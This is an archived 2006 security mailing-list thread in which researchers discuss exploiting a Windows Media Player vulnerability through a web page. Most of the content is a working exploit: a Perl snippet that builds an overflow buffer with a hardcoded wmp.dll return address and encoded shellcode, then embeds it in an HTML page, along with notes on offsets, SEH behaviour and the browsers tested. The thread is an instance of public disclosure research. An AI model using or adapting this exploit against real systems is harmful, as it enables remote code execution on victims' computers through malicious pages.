Re: MS06-06 Windows Media Player Exploitation

[H D Moore <fdlist () digitaloffense net>]

Got it working finally :-) The alpha shellcode stuff is actually 
Skylined's (ported to perl), the non-alpha prefix is only used if you 
dont pass GETPCTYPE=win32 for PexAlphaNum or GETPCTYPE=seh for Alpha2. I 
am using an address in wmp.dll (v9) and tested it successfully on Firefox 
and Opera. Time to start porting to v10 and have it auto-detect the WMP 
version. Keep your SRC path less than 4K or you end up smashing the PEB's  
module list pointers (at least with Firefox)...

-HD

<code>
my $addr = 0x07694b1e; # wmp.dll v9.00.00.2980
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $pattern   = Pex::Text::AlphaNumText(4096);

substr($pattern, 2082, 4,   "ABC=");       # inc, inc, inc, cmp eax, [ptr]      
substr($pattern, 2086, 4, pack('V', $addr));
substr($pattern, 2090, length($shellcode), $shellcode);

my $content   = "<html><body><embed type=\"application/x-mplayer2\" 
src=\"$pattern.wmv\"></body></html>";
</code>

On Thursday 16 February 2006 19:15, c0ntex wrote:
> On 16/02/06, H D Moore <fdlist () digitaloffense net> wrote:
> > Still getting some annoying crashes (SEH trick in alphanum code is
> > annoying when you are trying to debug something...), but the basic
> > solution is:
>
> Ye, we are on the same path if you looked at my notes, SEH works
> flawlessly and can redirect no problem, but getting the stable
> location to have it go is the problem. I had to reject the "pass
> shellcode in the src="" method as I am finding your Alpha shellcode
> skechy and not 100% alpha :p due to the FF and other annoying
> characters, which cause it to bork.
>
> I'm working on another method which is looking more realistic but I
> need to wait til tomorrow now as I need to sleep  :)
>
> --
>
> regards
> c0ntex
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/